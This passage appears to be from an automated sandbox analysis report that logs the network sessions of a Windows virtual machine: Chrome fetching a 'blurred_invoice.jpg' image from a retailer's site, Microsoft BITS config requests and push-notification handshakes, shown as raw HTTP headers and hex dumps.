      Server: nginx/1.10.3 (Ubuntu)
      Date: Sun, 29 Sep 2024 00:45:39 GMT
      Content-Type: image/jpeg
      Content-Length: 7494
      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
      Connection: close
      ETag: "62e062bc-1d46"
      Expires: Mon, 29 Sep 2025 00:45:39 GMT
      Cache-Control: max-age=31536000
      Cache-Control: public
      X-Frame-Options: SAMEORIGIN
      Accept-Ranges: bytes
      2024-09-29 00:45:39 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.64972995.154.228.1774436228C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:41 UTC435OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
      Host: www.continentalsports.co.uk
      Connection: keep-alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: */*
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-29 00:45:41 UTC370INHTTP/1.1 200 OK
      Server: nginx/1.10.3 (Ubuntu)
      Date: Sun, 29 Sep 2024 00:45:41 GMT
      Content-Type: image/jpeg
      Content-Length: 7494
      Last-Modified: Tue, 26 Jul 2022 21:55:08 GMT
      Connection: close
      ETag: "62e062bc-1d46"
      Expires: Mon, 29 Sep 2025 00:45:41 GMT
      Cache-Control: max-age=31536000
      Cache-Control: public
      X-Frame-Options: SAMEORIGIN
      Accept-Ranges: bytes
      2024-09-29 00:45:41 UTC7494INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 38 30 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 38 30 0a ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c2 00 11 08 01 09 01 09 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 00 02 03 01 01 00 00 00 00 00 00
      Data Ascii: JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 80C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.649725184.28.90.27443
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:41 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Encoding: identity
      User-Agent: Microsoft BITS/7.8
      Host: fs.microsoft.com
      2024-09-29 00:45:41 UTC467INHTTP/1.1 200 OK
      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
      Content-Type: application/octet-stream
      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
      Server: ECAcc (lpl/EF67)
      X-CID: 11
      X-Ms-ApiVersion: Distribute 1.2
      X-Ms-Region: prod-neu-z1
      Cache-Control: public, max-age=143961
      Date: Sun, 29 Sep 2024 00:45:41 GMT
      Connection: close
      X-CID: 2


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      5192.168.2.649730184.28.90.27443
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:42 UTC239OUTGET /fs/windows/config.json HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      Accept-Encoding: identity
      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
      Range: bytes=0-2147483646
      User-Agent: Microsoft BITS/7.8
      Host: fs.microsoft.com
      2024-09-29 00:45:42 UTC515INHTTP/1.1 200 OK
      ApiVersion: Distribute 1.1
      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
      Content-Type: application/octet-stream
      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
      Server: ECAcc (lpl/EF06)
      X-CID: 11
      X-Ms-ApiVersion: Distribute 1.2
      X-Ms-Region: prod-weu-z1
      Cache-Control: public, max-age=143990
      Date: Sun, 29 Sep 2024 00:45:42 GMT
      Content-Length: 55
      Connection: close
      X-CID: 2
      2024-09-29 00:45:42 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


      Session IDSource IPSource PortDestination IPDestination Port
      6192.168.2.64973140.115.3.253443
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 34 4f 51 55 4b 61 33 57 30 79 6b 54 46 35 6a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 62 32 65 31 63 33 36 39 66 64 64 39 66 33 0d 0a 0d 0a
      Data Ascii: CNT 1 CON 305MS-CV: O4OQUKa3W0ykTF5j.1Context: 6ab2e1c369fdd9f3
      2024-09-29 00:45:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
      2024-09-29 00:45:44 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 34 4f 51 55 4b 61 33 57 30 79 6b 54 46 35 6a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 62 32 65 31 63 33 36 39 66 64 64 39 66 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 56 38 47 57 55 47 78 42 57 41 76 70 4a 42 6c 32 6f 57 75 4f 36 77 42 45 50 6e 49 47 6b 50 49 44 6b 45 53 74 4c 4a 32 4b 5a 37 43 43 42 58 49 56 55 4c 64 62 59 5a 6f 79 55 57 31 5a 32 73 41 54 6e 54 51 52 39 44 4d 30 2b 42 70 73 55 4a 78 30 30 66 35 2b 62 54 52 57 66 36 36 7a 75 73 6f 4d 6d 66 66 43 73 51 6c 38 4d 54 75 4f
      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: O4OQUKa3W0ykTF5j.2Context: 6ab2e1c369fdd9f3<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUV8GWUGxBWAvpJBl2oWuO6wBEPnIGkPIDkEStLJ2KZ7CCBXIVULdbYZoyUW1Z2sATnTQR9DM0+BpsUJx00f5+bTRWf66zusoMmffCsQl8MTuO
      2024-09-29 00:45:44 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 34 4f 51 55 4b 61 33 57 30 79 6b 54 46 35 6a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 61 62 32 65 31 63 33 36 39 66 64 64 39 66 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
      Data Ascii: BND 3 CON\WNS 0 197MS-CV: O4OQUKa3W0ykTF5j.3Context: 6ab2e1c369fdd9f3<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
      2024-09-29 00:45:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
      Data Ascii: 202 1 CON 58
      2024-09-29 00:45:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 74 42 76 64 4d 64 33 4f 55 43 36 65 68 79 78 56 69 73 72 43 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
      Data Ascii: MS-CV: BtBvdMd3OUC6ehyxVisrCQ.0Payload parsing failed.


      Session IDSource IPSource PortDestination IPDestination Port
      7192.168.2.66112040.115.3.253443
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:57 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 72 61 50 47 36 50 75 63 79 6b 65 56 57 76 2b 79 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 65 37 33 37 39 66 33 63 63 36 31 39 37 35 30 0d 0a 0d 0a
      Data Ascii: CNT 1 CON 305MS-CV: raPG6PucykeVWv+y.1Context: 2e7379f3cc619750
      2024-09-29 00:45:57 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
      2024-09-29 00:45:57 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 72 61 50 47 36 50 75 63 79 6b 65 56 57 76 2b 79 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 65 37 33 37 39 66 33 63 63 36 31 39 37 35 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 56 38 47 57 55 47 78 42 57 41 76 70 4a 42 6c 32 6f 57 75 4f 36 77 42 45 50 6e 49 47 6b 50 49 44 6b 45 53 74 4c 4a 32 4b 5a 37 43 43 42 58 49 56 55 4c 64 62 59 5a 6f 79 55 57 31 5a 32 73 41 54 6e 54 51 52 39 44 4d 30 2b 42 70 73 55 4a 78 30 30 66 35 2b 62 54 52 57 66 36 36 7a 75 73 6f 4d 6d 66 66 43 73 51 6c 38 4d 54 75 4f
      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: raPG6PucykeVWv+y.2Context: 2e7379f3cc619750<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUV8GWUGxBWAvpJBl2oWuO6wBEPnIGkPIDkEStLJ2KZ7CCBXIVULdbYZoyUW1Z2sATnTQR9DM0+BpsUJx00f5+bTRWf66zusoMmffCsQl8MTuO
      2024-09-29 00:45:57 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 72 61 50 47 36 50 75 63 79 6b 65 56 57 76 2b 79 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 65 37 33 37 39 66 33 63 63 36 31 39 37 35 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
      Data Ascii: BND 3 CON\WNS 0 197MS-CV: raPG6PucykeVWv+y.3Context: 2e7379f3cc619750<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
      2024-09-29 00:45:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
      Data Ascii: 202 1 CON 58
      2024-09-29 00:45:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 55 67 31 32 30 49 78 38 45 6d 37 43 46 4d 4e 58 74 67 64 51 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
      Data Ascii: MS-CV: jUg120Ix8Em7CFMNXtgdQw.0Payload parsing failed.


      Session IDSource IPSource PortDestination IPDestination Port
      8192.168.2.66112140.115.3.253443
      TimestampBytes transferredDirectionData
      2024-09-29 00:46:16 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 55 5a 79 70 78 6a 5a 4f 45 6b 57 2f 61 45 54 44 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 34 31 62 37 31 36 33 66 64 32 64 32 35 39 0d 0a 0d 0a
      Data Ascii: CNT 1 CON 305MS-CV: UZypxjZOEkW/aETD.1Context: 5741b7163fd2d259
      2024-09-29 00:46:16 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
      2024-09-29 00:46:16 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 55 5a 79 70 78 6a 5a 4f 45 6b 57 2f 61 45 54 44 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 34 31 62 37 31 36 33 66 64 32 64 32 35 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 56 38 47 57 55 47 78 42 57 41 76 70 4a 42 6c 32 6f 57 75 4f 36 77 42 45 50 6e 49 47 6b 50 49 44 6b 45 53 74 4c 4a 32 4b 5a 37 43 43 42 58 49 56 55 4c 64 62 59 5a 6f 79 55 57 31 5a 32 73 41 54 6e 54 51 52 39 44 4d 30 2b 42 70 73 55 4a 78 30 30 66 35 2b 62 54 52 57 66 36 36 7a 75 73 6f 4d 6d 66 66 43 73 51 6c 38 4d 54 75 4f
      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: UZypxjZOEkW/aETD.2Context: 5741b7163fd2d259<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUV8GWUGxBWAvpJBl2oWuO6wBEPnIGkPIDkEStLJ2KZ7CCBXIVULdbYZoyUW1Z2sATnTQR9DM0+BpsUJx00f5+bTRWf66zusoMmffCsQl8MTuO
      2024-09-29 00:46:16 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 55 5a 79 70 78 6a 5a 4f 45 6b 57 2f 61 45 54 44 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 34 31 62 37 31 36 33 66 64 32 64 32 35 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
      Data Ascii: BND 3 CON\WNS 0 197MS-CV: UZypxjZOEkW/aETD.3Context: 5741b7163fd2d259<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
      2024-09-29 00:46:17 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
      Data Ascii: 202 1 CON 58
      2024-09-29 00:46:17 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 74 36 78 4f 65 71 75 58 30 36 57 65 62 58 54 55 33 64 6a 74 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
      Data Ascii: MS-CV: ct6xOequX06WebXTU3djtQ.0Payload parsing failed.


      Session IDSource IPSource PortDestination IPDestination Port
      9192.168.2.65918840.115.3.253443
      TimestampBytes transferredDirectionData
      2024-09-29 00:46:42 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 38 66 73 66 68 67 65 33 59 45 61 37 38 48 6c 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 35 39 66 65 32 31 37 37 34 37 65 33 39 33 0d 0a 0d 0a
      Data Ascii: CNT 1 CON 305MS-CV: 8fsfhge3YEa78Hlk.1Context: 3b59fe217747e393
      2024-09-29 00:46:42 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
      2024-09-29 00:46:42 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 38 66 73 66 68 67 65 33 59 45 61 37 38 48 6c 6b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 35 39 66 65 32 31 37 37 34 37 65 33 39 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 56 38 47 57 55 47 78 42 57 41 76 70 4a 42 6c 32 6f 57 75 4f 36 77 42 45 50 6e 49 47 6b 50 49 44 6b 45 53 74 4c 4a 32 4b 5a 37 43 43 42 58 49 56 55 4c 64 62 59 5a 6f 79 55 57 31 5a 32 73 41 54 6e 54 51 52 39 44 4d 30 2b 42 70 73 55 4a 78 30 30 66 35 2b 62 54 52 57 66 36 36 7a 75 73 6f 4d 6d 66 66 43 73 51 6c 38 4d 54 75 4f
      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 8fsfhge3YEa78Hlk.2Context: 3b59fe217747e393<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUV8GWUGxBWAvpJBl2oWuO6wBEPnIGkPIDkEStLJ2KZ7CCBXIVULdbYZoyUW1Z2sATnTQR9DM0+BpsUJx00f5+bTRWf66zusoMmffCsQl8MTuO
      2024-09-29 00:46:42 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 38 66 73 66 68 67 65 33 59 45 61 37 38 48 6c 6b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 62 35 39 66 65 32 31 37 37 34 37 65 33 39 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
      Data Ascii: BND 3 CON\WNS 0 197MS-CV: 8fsfhge3YEa78Hlk.3Context: 3b59fe217747e393<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
      2024-09-29 00:46:42 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
      Data Ascii: 202 1 CON 58
      2024-09-29 00:46:42 UTC58INData Raw: 4d 53 2d 43 56 3a 20 77 61 38 51 4a 6e 41 39 6d 45 32 4c 56 2f 39 44 71 48 76 49 72 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
      Data Ascii: MS-CV: wa8QJnA9mE2LV/9DqHvIrQ.0Payload parsing failed.


      Click to jump to process

      Click to jump to process

      Click to jump to process

      Target ID:0
      Start time:20:45:29
      Start date:28/09/2024
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
